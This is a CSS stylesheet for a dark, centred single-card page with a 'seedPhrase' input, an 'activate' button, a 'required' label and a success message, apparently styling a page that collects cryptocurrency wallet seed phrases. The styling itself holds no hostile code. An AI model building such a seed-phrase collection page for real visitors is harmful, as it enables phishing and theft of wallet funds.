/* General Styles */
* {
    margin: 0;
    padding: 0;
    box-sizing: border-box;
    font-family: 'Arial', sans-serif;
}

body {
    background: #0a0a1a;
    color: white;
    display: flex;
    justify-content: center;
    align-items: center;
    height: 100vh;
    flex-direction: column;
    padding: 20px;
}

/* Container */
.container {
    width: 100%;
    max-width: 480px;
    text-align: center;
    background: rgba(255, 255, 255, 0.1);
    padding: 25px;
    border-radius: 12px;
    box-shadow: 0 4px 10px rgba(0, 0, 0, 0.3);
}

h1 {
    font-size: 22px;
    margin-bottom: 10px;
}

.subtitle {
    font-size: 14px;
    margin-bottom: 15px;
    color: #bbb;
}

.required-label {
    font-size: 12px;
    color: #ffcc00;
    display: block;
    margin-bottom: 10px;
}

/* Form */
#activation-form {
    margin: 15px 0;
}

#seedPhrase {
    width: 100%;
    padding: 12px;
    border: 2px solid #007bff;
    border-radius: 6px;
    font-size: 16px;
    outline: none;
    transition: 0.3s;
}

#seedPhrase:focus {
    border-color: #00ffcc;
    box-shadow: 0 0 10px #00ffcc;
}

#activateBtn {
    width: 100%;
    padding: 12px;
    margin-top: 10px;
    background: linear-gradient(45deg, #007bff, #00bfff);
    color: white;
    border: none;
    border-radius: 6px;
    cursor: pointer;
    font-size: 16px;
    font-weight: bold;
    transition: 0.3s;
}

#activateBtn:hover {
    background: linear-gradient(45deg, #0056b3, #0099cc);
}

/* Success Message */
#success-message {
    font-size: 16px;
    color: #00ff00;
    background: rgba(255, 255, 255, 0.1);
    padding: 12px;
    border-radius: 6px;
    margin-top: 15px;
    display: none;
    animation: fadeIn 0.5s ease-in-out;
}

@keyframes fadeIn {
    from {
        opacity: 0;
        transform: translateY(-10px);
    }
    to {
        opacity: 1;
        transform: translateY(0);
    }
}

/* Social Icons */
.social-icons {
    margin-top: 20px;
}

.social-icons a {
    margin: 0 8px;
}

footer {
    margin-top: 20px;
    font-size: 12px;
    color: #aaa;
}

footer a {
    color: #00ccff;
    text-decoration: none;
    font-weight: bold;
}

footer a:hover {
    text-decoration: underline;
}

.social-icons {
    display: flex;
    justify-content: center;
    gap: 15px;
    margin-top: 20px;
}

.social-icons a {
    width: 40px;
    height: 40px;
    display: flex;
    justify-content: center;
    align-items: center;
    border-radius: 50%;
    background: rgba(255, 255, 255, 0.1);
    transition: 0.3s;
}

.social-icons a:hover {
    background: rgba(255, 255, 255, 0.2);
}

.social-icons svg {
    width: 24px;
    height: 24px;
    fill: white;
    transition: 0.3s;
}

.social-icons a:hover svg {
    fill: #00ccff;
}